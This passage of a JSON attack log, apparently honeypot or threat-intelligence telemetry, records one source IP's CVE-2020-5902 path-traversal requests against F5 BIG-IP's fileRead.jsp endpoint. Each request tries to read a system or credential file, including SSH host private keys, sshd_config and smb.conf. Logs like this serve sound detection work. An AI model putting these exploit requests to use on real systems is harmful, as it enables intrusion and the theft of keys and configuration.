3271. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/vsftpd.conf HTTP/1.1",
3272. "post_data": "",
3273. "target_port": 443,
3274. "protocol": "tcp",
3275. "tags": [
3276. {
3277. "cve": "CVE-2020-5902",
3278. "category": "Platform",
3279. "description": "F5 BIG-IP Configuration Utility RCE"
3280. }
3281. ],
3282. "event_count": 1,
3283. "first_seen": "2020-07-09T08:03:50Z",
3284. "last_seen": "2020-07-09T08:03:50Z"
3285. },
3286. {
3287. "event_id": "8b59a5063c96f2133796873a96fb58bc2977fc589590859dd4e33ca082cf6fee",
3288. "source_ip_address": "85.248.227.163",
3289. "country": "SK",
3290. "user_agent": "python-requests/2.23.0",
3291. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/vsftpd.chroot_list HTTP/1.1",
3292. "post_data": "",
3293. "target_port": 443,
3294. "protocol": "tcp",
3295. "tags": [
3296. {
3297. "cve": "CVE-2020-5902",
3298. "category": "Platform",
3299. "description": "F5 BIG-IP Configuration Utility RCE"
3300. }
3301. ],
3302. "event_count": 1,
3303. "first_seen": "2020-07-09T08:03:48Z",
3304. "last_seen": "2020-07-09T08:03:48Z"
3305. },
3306. {
3307. "event_id": "f8c06d8f1b91938cb4f8cde8094bb1d1637a17500d6bae56efbcdcf71ceff101",
3308. "source_ip_address": "85.248.227.163",
3309. "country": "SK",
3310. "user_agent": "python-requests/2.23.0",
3311. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/vhcs2/proftpd/proftpd.conf HTTP/1.1",
3312. "post_data": "",
3313. "target_port": 443,
3314. "protocol": "tcp",
3315. "tags": [
3316. {
3317. "cve": "CVE-2020-5902",
3318. "category": "Platform",
3319. "description": "F5 BIG-IP Configuration Utility RCE"
3320. }
3321. ],
3322. "event_count": 1,
3323. "first_seen": "2020-07-09T08:03:47Z",
3324. "last_seen": "2020-07-09T08:03:47Z"
3325. },
3326. {
3327. "event_id": "ac25f447591c3a6e7c8091c0480e66c75440f26b2d7f6ed4f61a358ea32f966c",
3328. "source_ip_address": "85.248.227.163",
3329. "country": "SK",
3330. "user_agent": "python-requests/2.23.0",
3331. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/termcap HTTP/1.1",
3332. "post_data": "",
3333. "target_port": 443,
3334. "protocol": "tcp",
3335. "tags": [
3336. {
3337. "cve": "CVE-2020-5902",
3338. "category": "Platform",
3339. "description": "F5 BIG-IP Configuration Utility RCE"
3340. }
3341. ],
3342. "event_count": 1,
3343. "first_seen": "2020-07-09T08:03:45Z",
3344. "last_seen": "2020-07-09T08:03:45Z"
3345. },
3346. {
3347. "event_id": "f9181b292b9d1d8f75033a8a84f480a90010eb6e38261d3ef445d2f9e3260950",
3348. "source_ip_address": "85.248.227.163",
3349. "country": "SK",
3350. "user_agent": "python-requests/2.23.0",
3351. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/syslog.conf HTTP/1.1",
3352. "post_data": "",
3353. "target_port": 443,
3354. "protocol": "tcp",
3355. "tags": [
3356. {
3357. "cve": "CVE-2020-5902",
3358. "category": "Platform",
3359. "description": "F5 BIG-IP Configuration Utility RCE"
3360. }
3361. ],
3362. "event_count": 1,
3363. "first_seen": "2020-07-09T08:03:44Z",
3364. "last_seen": "2020-07-09T08:03:44Z"
3365. },
3366. {
3367. "event_id": "8a8882f6ce6c7ecc0dbb2970ce02c962b8ddccce531255b79f9e5dd12e8c8829",
3368. "source_ip_address": "85.248.227.163",
3369. "country": "SK",
3370. "user_agent": "python-requests/2.23.0",
3371. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/sysconfig/network HTTP/1.1",
3372. "post_data": "",
3373. "target_port": 443,
3374. "protocol": "tcp",
3375. "tags": [
3376. {
3377. "cve": "CVE-2020-5902",
3378. "category": "Platform",
3379. "description": "F5 BIG-IP Configuration Utility RCE"
3380. }
3381. ],
3382. "event_count": 1,
3383. "first_seen": "2020-07-09T08:03:42Z",
3384. "last_seen": "2020-07-09T08:03:42Z"
3385. },
3386. {
3387. "event_id": "d8bd823ae0f87ba8896192ce68759db0af0ed462b1e18e5169ea86f0c79e0290",
3388. "source_ip_address": "85.248.227.163",
3389. "country": "SK",
3390. "user_agent": "python-requests/2.23.0",
3391. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_host_key.pub HTTP/1.1",
3392. "post_data": "",
3393. "target_port": 443,
3394. "protocol": "tcp",
3395. "tags": [
3396. {
3397. "cve": "CVE-2020-5902",
3398. "category": "Platform",
3399. "description": "F5 BIG-IP Configuration Utility RCE"
3400. }
3401. ],
3402. "event_count": 1,
3403. "first_seen": "2020-07-09T08:03:41Z",
3404. "last_seen": "2020-07-09T08:03:41Z"
3405. },
3406. {
3407. "event_id": "c66fd426fe8e1fbbc6d0c200251968cf19d1a38115be9c4abccc5e24721027ce",
3408. "source_ip_address": "85.248.227.163",
3409. "country": "SK",
3410. "user_agent": "python-requests/2.23.0",
3411. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_host_key HTTP/1.1",
3412. "post_data": "",
3413. "target_port": 443,
3414. "protocol": "tcp",
3415. "tags": [
3416. {
3417. "cve": "CVE-2020-5902",
3418. "category": "Platform",
3419. "description": "F5 BIG-IP Configuration Utility RCE"
3420. }
3421. ],
3422. "event_count": 1,
3423. "first_seen": "2020-07-09T08:03:39Z",
3424. "last_seen": "2020-07-09T08:03:39Z"
3425. },
3426. {
3427. "event_id": "c9abfc000dce4fe0ac0c86d8bb1ae663f6526ff81b9c90dd68bac0fff7757f0c",
3428. "source_ip_address": "85.248.227.163",
3429. "country": "SK",
3430. "user_agent": "python-requests/2.23.0",
3431. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_host_dsa_key.pub HTTP/1.1",
3432. "post_data": "",
3433. "target_port": 443,
3434. "protocol": "tcp",
3435. "tags": [
3436. {
3437. "cve": "CVE-2020-5902",
3438. "category": "Platform",
3439. "description": "F5 BIG-IP Configuration Utility RCE"
3440. }
3441. ],
3442. "event_count": 1,
3443. "first_seen": "2020-07-09T08:03:38Z",
3444. "last_seen": "2020-07-09T08:03:38Z"
3445. },
3446. {
3447. "event_id": "9f5ff5be3e58bc9bedca65b2c3465261d75d822cbfc967647e0b0738ded73b50",
3448. "source_ip_address": "85.248.227.163",
3449. "country": "SK",
3450. "user_agent": "python-requests/2.23.0",
3451. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_host_dsa_key HTTP/1.1",
3452. "post_data": "",
3453. "target_port": 443,
3454. "protocol": "tcp",
3455. "tags": [
3456. {
3457. "cve": "CVE-2020-5902",
3458. "category": "Platform",
3459. "description": "F5 BIG-IP Configuration Utility RCE"
3460. }
3461. ],
3462. "event_count": 1,
3463. "first_seen": "2020-07-09T08:03:36Z",
3464. "last_seen": "2020-07-09T08:03:36Z"
3465. },
3466. {
3467. "event_id": "0a8bb510c3fbb3f0d1235c869454a408e5d30117d11cd6363d64b6cb371b83f8",
3468. "source_ip_address": "85.248.227.163",
3469. "country": "SK",
3470. "user_agent": "python-requests/2.23.0",
3471. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/sshd_config HTTP/1.1",
3472. "post_data": "",
3473. "target_port": 443,
3474. "protocol": "tcp",
3475. "tags": [
3476. {
3477. "cve": "CVE-2020-5902",
3478. "category": "Platform",
3479. "description": "F5 BIG-IP Configuration Utility RCE"
3480. }
3481. ],
3482. "event_count": 1,
3483. "first_seen": "2020-07-09T08:03:35Z",
3484. "last_seen": "2020-07-09T08:03:35Z"
3485. },
3486. {
3487. "event_id": "f6d4d44b702e69d750039a4997cff5fddd2e4094af137c52ffd468de05d4c5a9",
3488. "source_ip_address": "85.248.227.163",
3489. "country": "SK",
3490. "user_agent": "python-requests/2.23.0",
3491. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/ssh/ssh_config HTTP/1.1",
3492. "post_data": "",
3493. "target_port": 443,
3494. "protocol": "tcp",
3495. "tags": [
3496. {
3497. "cve": "CVE-2020-5902",
3498. "category": "Platform",
3499. "description": "F5 BIG-IP Configuration Utility RCE"
3500. }
3501. ],
3502. "event_count": 1,
3503. "first_seen": "2020-07-09T08:03:33Z",
3504. "last_seen": "2020-07-09T08:03:33Z"
3505. },
3506. {
3507. "event_id": "01d7f38c325091571decaf7f9684199d09008ae63e793e31c33faea38a1d999d",
3508. "source_ip_address": "85.248.227.163",
3509. "country": "SK",
3510. "user_agent": "python-requests/2.23.0",
3511. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/snmpd.conf HTTP/1.1",
3512. "post_data": "",
3513. "target_port": 443,
3514. "protocol": "tcp",
3515. "tags": [
3516. {
3517. "cve": "CVE-2020-5902",
3518. "category": "Platform",
3519. "description": "F5 BIG-IP Configuration Utility RCE"
3520. }
3521. ],
3522. "event_count": 1,
3523. "first_seen": "2020-07-09T08:03:32Z",
3524. "last_seen": "2020-07-09T08:03:32Z"
3525. },
3526. {
3527. "event_id": "d8ad4782b8ed12541250db9a77838c526fc7562307427e36221145296e376986",
3528. "source_ip_address": "85.248.227.163",
3529. "country": "SK",
3530. "user_agent": "python-requests/2.23.0",
3531. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/samba/smb.conf HTTP/1.1",
3532. "post_data": "",
3533. "target_port": 443,
3534. "protocol": "tcp",
3535. "tags": [
3536. {
3537. "cve": "CVE-2020-5902",
3538. "category": "Platform",
3539. "description": "F5 BIG-IP Configuration Utility RCE"
3540. }
3541. ],
3542. "event_count": 1,
3543. "first_seen": "2020-07-09T08:03:31Z",
3544. "last_seen": "2020-07-09T08:03:31Z"
3545. },
3546. {
3547. "event_id": "db033e859264eb9b59524662cbd68af4bb12d4841239cbc119e7cb76e64f99af",
3548. "source_ip_address": "85.248.227.163",
3549. "country": "SK",
3550. "user_agent": "python-requests/2.23.0",
3551. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/resolv.conf HTTP/1.1",
3552. "post_data": "",
3553. "target_port": 443,
3554. "protocol": "tcp",
3555. "tags": [
3556. {
3557. "cve": "CVE-2020-5902",
3558. "category": "Platform",
3559. "description": "F5 BIG-IP Configuration Utility RCE"
3560. }
3561. ],
3562. "event_count": 1,
3563. "first_seen": "2020-07-09T08:03:29Z",
3564. "last_seen": "2020-07-09T08:03:29Z"
3565. },
3566. {
3567. "event_id": "2de644597c834b9f663255379ee7cc8b9ab14fd797197211c1f041133aa54f90",
3568. "source_ip_address": "85.248.227.163",
3569. "country": "SK",
3570. "user_agent": "python-requests/2.23.0",
3571. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/redhat-release HTTP/1.1",
3572. "post_data": "",
3573. "target_port": 443,
3574. "protocol": "tcp",
3575. "tags": [
3576. {
3577. "cve": "CVE-2020-5902",
3578. "category": "Platform",
3579. "description": "F5 BIG-IP Configuration Utility RCE"
3580. }
3581. ],
3582. "event_count": 1,
3583. "first_seen": "2020-07-09T08:03:28Z",
3584. "last_seen": "2020-07-09T08:03:28Z"
3585. },
3586. {
3587. "event_id": "9a13c0de7f3fae73baf0f0407f7b1fd8ec1f6da061956efbedc72a24b2ff9d43",
3588. "source_ip_address": "85.248.227.163",
3589. "country": "SK",
3590. "user_agent": "python-requests/2.23.0",
3591. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/pure-ftpd/putreftpd.pdb HTTP/1.1",
3592. "post_data": "",
3593. "target_port": 443,
3594. "protocol": "tcp",
3595. "tags": [
3596. {
3597. "cve": "CVE-2020-5902",
3598. "category": "Platform",
3599. "description": "F5 BIG-IP Configuration Utility RCE"
3600. }
3601. ],
3602. "event_count": 1,
3603. "first_seen": "2020-07-09T08:03:26Z",
3604. "last_seen": "2020-07-09T08:03:26Z"
3605. },
3606. {
3607. "event_id": "c5b1d77e7998a8eed274238fe02938bad03bfb3ca395cedb1345f59ea3804e79",
3608. "source_ip_address": "85.248.227.163",
3609. "country": "SK",
3610. "user_agent": "python-requests/2.23.0",
3611. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/pure-ftpd/pure-ftpd.pdb HTTP/1.1",
3612. "post_data": "",
3613. "target_port": 443,
3614. "protocol": "tcp",
3615. "tags": [
3616. {
3617. "cve": "CVE-2020-5902",
3618. "category": "Platform",
3619. "description": "F5 BIG-IP Configuration Utility RCE"
3620. }
3621. ],
3622. "event_count": 1,
3623. "first_seen": "2020-07-09T08:03:25Z",
3624. "last_seen": "2020-07-09T08:03:25Z"
3625. },
3626. {
3627. "event_id": "659bd9bb6559db76c2749604e06226172c6c24e1ccac9f7f316da988073c4586",
3628. "source_ip_address": "85.248.227.163",
3629. "country": "SK",
3630. "user_agent": "python-requests/2.23.0",
3631. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/pure-ftpd/pure-ftpd.conf HTTP/1.1",
3632. "post_data": "",
3633. "target_port": 443,
3634. "protocol": "tcp",
3635. "tags": [
3636. {
3637. "cve": "CVE-2020-5902",
3638. "category": "Platform",
3639. "description": "F5 BIG-IP Configuration Utility RCE"
3640. }
3641. ],
3642. "event_count": 1,
3643. "first_seen": "2020-07-09T08:03:23Z",
3644. "last_seen": "2020-07-09T08:03:23Z"
3645. }
3646. ]
3647. }